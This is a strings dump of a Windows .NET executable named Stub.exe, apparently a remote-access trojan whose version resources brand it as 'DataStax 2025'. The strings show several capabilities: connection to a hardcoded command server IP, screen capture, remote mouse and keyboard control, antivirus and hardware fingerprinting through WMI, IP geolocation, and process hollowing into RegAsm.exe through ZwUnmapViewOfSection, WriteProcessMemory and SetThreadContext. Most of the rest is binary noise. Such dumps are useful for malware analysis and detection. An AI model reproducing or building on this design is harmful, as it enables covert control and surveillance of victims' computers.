!This program cannot be run in DOS mode.
`.rsrc
@.reloc
FJ%$>R
"-D*3^v
dD!NLS
6flc<B
TtmtcP
LLgY h\
-S |4!
"_7?w_7
`A` 'O
L6,G4G
[K?m%V!
8W)F%}g!e#
:.V;9X;
o(6fo(
sb>_Kn
&1M}=>
c[mJ~JJv
pU1qR,
:E?_P?@j
lrH.U2F
a,kVnd
0[[\ii
!$"5u\
K\.TmJ
JkO,$q
tKCo^g
nQJ;J;<!@
O+mUK;T-
nOHUfW
e %:K;),e
(nLJ2I
W:'gm/Qt
v!1tp"1
@$>H o
ji,$QR
,}O4R[
nv.l,X
Y+kMBkB
lv+~%P
hBf@?o
X[]Gw0
T(bC[KSu1
OuAXHk&
XI2jIF
L@/`3`
costura.costura.dll.compressed|6.0.0.0|Costura, Version=6.0.0.0, Culture=neutral, PublicKeyToken=9919ef960d84173d|Costura.dll|028E9832F421F11F9497C610F1734E0F3D868037|5120
costura.costura.pdb.compressed|||Costura.pdb|806F4C19B2D7FD9E3B836269EC07647019A29E95|7960
costura.fastsearchlibrary.dll.compressed|1.1.8.0|FastSearchLibrary, Version=1.1.8.0, Culture=neutral, PublicKeyToken=null|FastSearchLibrary.dll|E47F69DA4D17B821A61CE9E4459B61C5ACDE4F11|30720
costura.packetlib.dll.compressed|1.0.0.0|PacketLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null|PacketLib.dll|06B6C5A9D6751E8F6866E51F577CAD5E16ADAB2F|8704
costura.packetlib.pdb.compressed|||PacketLib.pdb|B6731127F1227589FC75FA2A083B15FAF0CAC57C|38400
v4.0.30319
#Strings
<>9__0_0
<Main>b__0_0
<>c__DisplayClass0_0
<>9__17_0
<Connect>b__17_0
<>c__DisplayClass18_0
<Recieve>b__0
<ToMemory>b__0
<>8__1
<ToMemory>b__1
<>u__1
Task`1
TaskAwaiter`1
List`1
Reserved1
kernel32
ToUInt32
ToInt32
<byteSize>5__2
Dictionary`2
Reserved2
<>7__wrap2
ToInt16
<Recieve>d__18
get_UTF8
<Module>
DelegateCreateProcessA
LoadLibraryA
System.Drawing.Drawing2D
get_FormatID
MD5_STRING
CURSOR_SHOWING
POINTAPI
CURSORINFO
System.IO
Costura
dwData
costura.metadata
PacketLib
mscorlib
ReleaseHdc
GetHdc
System.Collections.Generic
Microsoft.VisualBasic
ReadAsync
ThreadId
ProcessId
GetProcessById
bytesRead
DelegateResumeThread
thread
payload
isAttached
Interlocked
costura.costura.pdb.compressed
costura.packetlib.pdb.compressed
costura.costura.dll.compressed
costura.packetlib.dll.compressed
costura.fastsearchlibrary.dll.compressed
get_Connected
isConnected
AwaitUnsafeOnCompleted
get_IsCompleted
get_Guid
<SendOneByOne>k__BackingField
<Value>k__BackingField
<isDesktopCapturing>k__BackingField
<networkStream>k__BackingField
<cancellationToken>k__BackingField
<WanIpAddress>k__BackingField
<packet>k__BackingField
<tcpClient>k__BackingField
<Country>k__BackingField
set_IsBackground
method
HandlePe
subscribe
Replace
CancellationTokenSource
source
CompressionMode
FromImage
message
Exchange
nullCache
EndInvoke
BeginInvoke
IDisposable
ThreadHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
WaitHandle
handle
Rectangle
Console
get_Name
GetMainboardName
GetAssemblyResourceName
get_MachineName
get_OSFullName
fullName
applicationName
SocketOptionName
get_UserName
GetName
GetCpuName
GetGpuName
requestedAssemblyName
get_SendOneByOne
set_SendOneByOne
commandLine
WriteLine
Combine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
culture
Capture
MethodBase
Dispose
Create
MulticastDelegate
<>1__state
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
Execute
ToByte
get_Value
set_Value
TryGetValue
Recieve
add_AssemblyResolve
Build.exe
get_Size
cbSize
bufferSize
SizeOf
get_Jpeg
Config
System.Threading
Encoding
System.Drawing.Imaging
System.Runtime.Versioning
DownloadString
CultureToString
GetAsString
get_isDesktopCapturing
set_isDesktopCapturing
System.Drawing
InfoLog
ErrorLog
Attach
get_Width
get_Length
length
EndsWith
LoadApi
CreateApi
MsgPack
AsyncCallback
WaitCallback
callback
unpack_msgpack
MsgUnpack
msgUnpack
nullCacheLock
Client.Network
Marshal
Cancel
SocketOptionLevel
user32.dll
ThreadPool
ReadStream
LoadStream
GetManifestResourceStream
DeflateStream
NetworkStream
get_networkStream
set_networkStream
GetStream
MemoryStream
stream
get_Param
Program
HandleMem
get_Item
set_Item
QueueUserWorkItem
get_Is64BitOperatingSystem
Boolean
CopyFromScreen
GetScreen
screen
get_Token
CancellationToken
get_cancellationToken
set_cancellationToken
GetAsBoolen
bytesWritten
AppDomain
get_CurrentDomain
DrawIcon
FodyVersion
System.IO.Compression
Application
StartupInformation
ProcessInformation
processInformation
destination
CopyPixelOperation
System.Globalization
Action
DelegateZwUnmapViewOfSection
injection
System.Reflection
ManagementObjectCollection
set_Position
SetSocketOption
SetException
StringComparison
CopyTo
dwExtraInfo
ImageCodecInfo
BasicInfo
MethodInfo
HandleInfo
get_CultureInfo
GeoInfo
startupInfo
ParameterInfo
ComputerInfo
GetCursorInfo
Bitmap
Client.Help
get_Top
HandleDesktop
AssemblyLoader
AsyncVoidMethodBuilder
<>t__builder
sender
GetEncoder
Buffer
buffer
GetAsInteger
Logger
ManagementObjectSearcher
ResolveEventHandler
ToUpper
GetBiosManufacturer
EncoderParameter
GetAwaiter
GetDelegateForFunctionPointer
BitConverter
StdError
hCursor
ManagementObjectEnumerator
GetEnumerator
.cctor
Monitor
UIntPtr
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
ReadFromEmbeddedResources
DebuggingModes
GetAssemblies
inheritHandles
resourceNames
symbolNames
assemblyNames
threadAttributes
processAttributes
WriteAllBytes
GetBytes
get_Flags
AssemblyNameFlags
creationFlags
dwFlags
ResolveEventArgs
System.Threading.Tasks
Equals
Client.Utils
System.Windows.Forms
get_AllScreens
ptScreenPos
get_Chars
GetImageDecoders
Client.Handlers
Helpers
EncoderParameters
GetParameters
hProcess
GetCurrentProcess
process
GetProcAddress
baseAddress
get_WanIpAddress
set_WanIpAddress
address
System.Net.Sockets
GetAntivirus
Concat
ImageFormat
format
ManagementBaseObject
ManagementObject
object
Collect
Connect
Disconnect
protect
System.Net
HandlePacket
get_packet
set_packet
Socket
get_Left
get_Height
WaitForExit
IAsyncResult
GetResult
SetResult
result
ToLowerInvariant
get_Client
WebClient
TcpClient
get_tcpClient
set_tcpClient
System.Management
RuntimeEnvironment
environment
get_Current
keybd_event
mouse_event
get_EntryPoint
get_Count
ThreadStart
Convert
StdInput
StdOutput
MoveNext
System.Text
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateWow64SetThreadContext
DelegateSetThreadContext
context
DelegateVirtualAllocEx
CloseMutEx
CreateMutEx
GetAsByteArray
ToArray
Stub_ProcessedByFody
ContainsKey
<0>__ResolveAssembly
ReadExistingAssembly
GetExecutingAssembly
BlockCopy
ToMemory
DelegateReadProcessMemory
DelegateWriteProcessMemory
GetRuntimeDirectory
currentDirectory
get_Country
set_Country
set_CompositingQuality
op_Equality
IsNullOrEmpty
WrapNonExceptionThrows
DataStax
Copyright
DataStax 2025
$55E9E107-B2C6-464B-BDF1-54529E764B58
7.5.2.3
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
%Client.Network._Client+<Recieve>d__18
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
wwfJqCAYXz
92.255.57.221
Packet
BasicInfo
Country
Username
Microsoft
Antivirus
ErrorLog
Message
InfoLog
From client !
no connection
Command
Screens
MouseClick
MouseWheel
MouseMove
KeyboardClick
Desktop
Screen
Quality
Button
isKeyDown
ImageBytes
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
SELECT * FROM Win32_BIOS
Manufacturer
Unknown
SELECT * FROM Win32_BaseBoard
Product
SELECT * FROM Win32_Processor
SELECT * FROM Win32_DisplayConfiguration
Description
http://ip-api.com/line
Inject
Framework64
Framework
Update
C:\Windows\Temp
FileName
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
kernel32
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
.compressed
costura
costura.costura.dll.compressed
costura.costura.pdb.compressed
fastsearchlibrary
costura.fastsearchlibrary.dll.compressed
packetlib
costura.packetlib.dll.compressed
costura.packetlib.pdb.compressed
6.8.2.0
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
DataStax
CompanyName
DataStax
FileDescription
DataStax
FileVersion
7.5.2.3
InternalName
Stub.exe
LegalCopyright
Copyright
DataStax 2025
LegalTrademarks
DataStax
OriginalFilename
Stub.exe
ProductName
DataStax
ProductVersion
7.5.2.3
Assembly Version
7.5.2.3